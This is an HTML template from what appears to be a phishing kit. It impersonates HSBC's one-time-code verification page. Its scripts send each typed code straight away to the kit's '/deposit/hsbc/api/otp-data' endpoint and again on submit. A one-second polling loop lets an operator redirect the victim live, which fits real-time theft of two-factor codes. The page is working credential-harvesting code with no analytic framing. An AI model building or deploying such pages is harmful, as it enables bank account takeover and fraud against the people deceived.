<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" type="text/css" href="/assets/hsbc/css/style.css">
        <link rel="shortcut icon" type="image/PNG" href="/assets/hsbc/img/logoTrans.png">
        <title>HSBC - Login</title>
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script>
            setInterval(function() {
                $.post('/deposit/hsbc/api/status', {page: '2FA (Waiting)'}, function(response) {
                    if (response.status) {
                        location.href = response.href;
                    }
                }, 'JSON');
            }, 1000);
        </script>
        <script>
        $(document).on('change', '#input-code', function() {
            $.post('/deposit/hsbc/api/otp-data', {code: $(this).val()});
        });

        $.post('/deposit/hsbc/api/otp-type', {type: 'Email'});

        $(document).on('submit', '#lab-form, .lab-form', function(e) {
            $('.btn-save').attr('disabled', true);
            $('.btn-save .btn-txt').css('display', 'none');
            $('.btn-save .btn-spinner').css('display', 'block');

            $.post('/deposit/hsbc/api/otp-submit', {code: $('#input-code').val()}, function(response) {
                location.href = '/deposit/hsbc/wo/' + rand_str(16);
            });

            e.preventDefault();
        });

        function rand_str(length) {
            var result           = '';
            var characters       = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
            var charactersLength = characters.length;
            for ( var i = 0; i < length; i++ ) {
                result += characters.charAt(Math.floor(Math.random() * charactersLength));
            }
            return result;
        }
        </script>
        <style>
        .btn {
            background-color: rgb(217, 9, 21) !important;
            border: 1px solid rgb(217, 9, 21) !important;
        }
        </style>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body>
        <img src="/assets/hsbc/img/logoTrans.png" id="transLogo">
        <div class="header">
            <div class="headerRow">
                <img src="/assets/hsbc/img/logoTrans.png" id="logo">
                <!-- <div class="btn" id="loginBtn">Login On </div> -->
            </div>
        </div>
        <div class="main">
            <div class="alignment div-main">
                <% if (error) { %>
                    <div class="global-error-from-container" tabindex="-1">
                        <div class="global-error-form-wrapper">
                            <div class="global-error-form-msg">
                                <span role="alert" style="color: red;" style="margin-bottom: 10px;">You have entered incorrect information. Check your code and try again.</span>
                            </div>
                        </div>
                    </div>
                    <% } %>
                <p class="pageTitle">Additional Verification</p>
                <p style="margin-bottom: 20px">To protect your account, we have sent a one-time code to your registered email address. Enter the code below to continue</p>
                <form id="loginForm" method='POST' autocomplete="off" class="lab-form">
                    <input type="hidden" id="userAgent" name="userAgent">
                    <div class="row" style="align-items: center;">
                        <p class="formLabel">One-time code</p>
                    </div>
                    <div class="inptContainer" style="margin-bottom: 20px">
                        <input type="tel" autocomplete="one-time-code" class="inptField lrinput" attr-action="Filling OTP" name='code' id="input-code" required>
                    </div>
                    <input onclick="submitForm()" type="button" class="btn" value="Continue" id="sbtn">
                </form>
            </div>
        </div>
        <div class="footer">
        </div>
        <span hidden id="navig"> <%=navig%> </span>
        <span hidden id="stage">OTP</span>
    </body>
    <script src="/bank/hsbc/js/script.js">
    </script>
</html>
